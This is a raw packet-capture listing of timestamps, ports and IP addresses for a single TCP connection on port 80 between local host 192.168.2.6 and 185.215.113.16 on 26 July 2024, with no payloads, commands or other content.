Jul 26, 2024 12:57:05.309217930 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309226990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309242964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309252977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309253931 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.309253931 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.309268951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309273005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.309304953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.309304953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.310156107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310167074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310183048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310193062 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310208082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310214043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.310219049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310233116 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.310239077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.310239077 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.310257912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.310270071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311113119 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311124086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311141014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311151028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311162949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311163902 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311173916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311180115 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311191082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.311194897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311203003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311220884 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.311244011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.312079906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312089920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312105894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312114954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312129021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312138081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.312139034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312145948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.312165976 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.312172890 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.312191963 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313033104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313043118 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313064098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313080072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313087940 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313087940 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313088894 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313107014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313112974 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313117027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.313132048 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313139915 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.313172102 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314002037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314013958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314030886 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314039946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314055920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314064980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314080954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314091921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314091921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314091921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314122915 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314122915 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314796925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314806938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314821005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314837933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314838886 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314848900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314848900 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314866066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314872980 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314876080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314893007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314894915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.314913034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.314934015 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.315597057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.315607071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.315650940 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.331001997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331290007 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331304073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331321955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331331968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331347942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331357956 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.331377983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.331377983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.331377983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.331423044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.364567995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364605904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364614964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364628077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364733934 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364742994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364754915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364770889 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.364815950 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.364857912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.365207911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365217924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365233898 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365242958 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365258932 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365267038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365487099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.365825891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365892887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.365968943 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.365978003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366024017 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.366290092 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366300106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366316080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366324902 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366338015 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.366359949 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.366816044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366826057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366842985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366851091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366858959 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.366868019 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366877079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.366878033 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.366905928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.367675066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367685080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367701054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367708921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367716074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.367724895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367734909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367749929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.367799997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.367799997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.367799997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.399744987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.399759054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.399863958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.399887085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.399898052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.399940968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400120020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400161028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400171995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400281906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400281906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400532961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400595903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400598049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400598049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400614023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400625944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400639057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400652885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.400661945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400661945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400682926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.400693893 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.401385069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401395082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401400089 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401416063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401437998 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401443958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.401452065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.401457071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.401494026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402245045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402255058 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402270079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402278900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402293921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402302980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402306080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402306080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402318001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402328968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.402328968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402349949 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402369976 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.402379990 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.403119087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403129101 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403146029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403155088 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403170109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403177977 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.403178930 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.403197050 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.403218985 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.403218985 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404040098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404051065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404066086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404074907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404089928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404098034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404099941 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404114962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404119968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404150009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404150009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404807091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404815912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404829025 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404834032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404844999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404848099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404854059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404867887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404879093 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.404879093 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404890060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404906034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.404934883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406035900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406045914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406059980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406071901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406085968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406094074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406096935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406119108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406119108 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406133890 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406625986 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406636000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406651020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406675100 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406678915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406685114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406685114 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406693935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.406744957 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.406757116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407217026 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407227993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407243967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407253027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407265902 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407269955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407275915 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407279968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407295942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407300949 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407306910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.407319069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407339096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.407362938 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.422658920 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422874928 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422889948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422909021 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.422913074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422921896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422929049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.422940969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.422959089 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.422992945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.423149109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.423203945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.456875086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.456892014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.456913948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.456953049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.456953049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.457222939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457240105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457257032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457266092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.457272053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457288980 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.457292080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457314968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.457344055 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.457817078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457825899 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457832098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457839012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.457886934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458136082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458147049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458178043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458194971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458374023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458384991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458416939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458431005 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458535910 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458548069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458587885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458597898 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458610058 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458620071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.458637953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458655119 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.458667994 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459027052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459038973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459057093 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459065914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459080935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459084034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459104061 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459114075 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459670067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459681988 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459697008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459707022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459707022 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459716082 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459724903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459733963 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.459736109 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459760904 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.459781885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.460556030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.460568905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.460582018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.460607052 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.460630894 CEST	60778	80	192.168.2.6	185.215.113.16
